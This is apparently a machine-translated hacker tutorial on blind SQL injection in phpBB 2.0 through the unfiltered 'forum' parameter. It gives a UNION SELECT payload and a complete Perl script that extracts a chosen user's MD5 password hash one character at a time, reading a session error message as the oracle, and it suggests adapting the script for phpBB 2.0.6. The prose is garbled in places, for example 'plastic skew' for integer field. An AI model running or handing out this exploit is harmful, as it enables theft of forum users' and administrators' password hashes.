PHP Injection Example It is difficult to see a complete article and usage code on php injection on the Internet, so I have been chewing mysql and php for several weeks. Let me talk about my recess, hoping to attract attention!
I believe everyone is already very familiar with asp injection, and injection of php is more difficult than asp, because the magic_gpc option of php is really a headache. There are no quotes in the injection, and most php is combined with mysql. The functional shortcomings of mysql have been prevented from a certain extent from another person's perspective. I will give an example here, and I will take phpbb2.0 as an example:
There is a variable in which it is not filtered:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval
($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
It is this forum, and the following directly puts it into the query:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
If it is an asp, I believe many people will inject it. If the forum specified by forum_id does not exist, $result will be empty, so it will return the information of Could not obtain forums information, so the following code cannot be executed
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************
The key is the line that calls the asterisk. Here is a function session_pagestart($user_ip, $thispage_id). This is a function defined in it. Because the code is too
If you are interested, you can take a look at it yourself. The key is that this function also calls session_begin(). The function call is as follows session_begin($user_id, $user_ip,
$thispage_id, TRUE)), also defined in this file, with the following code
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =
$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));
$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,
session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,
$sql);
}
Here is a session_page that defines a plastic skew in mysql. Its skew $page_id, that is, $forum_id. If the inserted one is not a plastic skew, an error will be reported, and an error will appear.
creating new session: session_begin prompt, so it is important to refer to the value of $forum_id, so I specified it as:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_p Assword,1,1))=57, no quotes! Although the specified forum_id is not present, the query result it returns may not be empty. This is to guess whether the ascii code value of the first password of the user_id is 57. If so, the $result in the first code in the article will not be empty. So the ession_pagestart function is executed. If it is not an integer, it will cause an error, so it will display an Error. creating new session : session_begin, which means that you guessed the first one, and other bits are similar.
If this error message is not available, I think it will be difficult to judge whether it has been successful even if the injection is successful. It seems that the error message is also very helpful. This is the end of the analysis. Here is a test code. This code can be applied to other similar cases of guessing md5 passwords with a slight modification. Here I use the return conditions for the English version, and for Chinese and other languages, just change the return conditions.
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;
print " ***********************n";
print " phpbb expn";
print " code by pinkeyesn";
print " ";
print " ************************n";
print "please enter the weak file's url:n";
print ". http://192.168.1.4/phpBB2/";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%
20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);
if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}
}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}
As for the recent phpbb2.0.6 problem, the program only needs to modify the above code slightly. If you want an error, please correct it.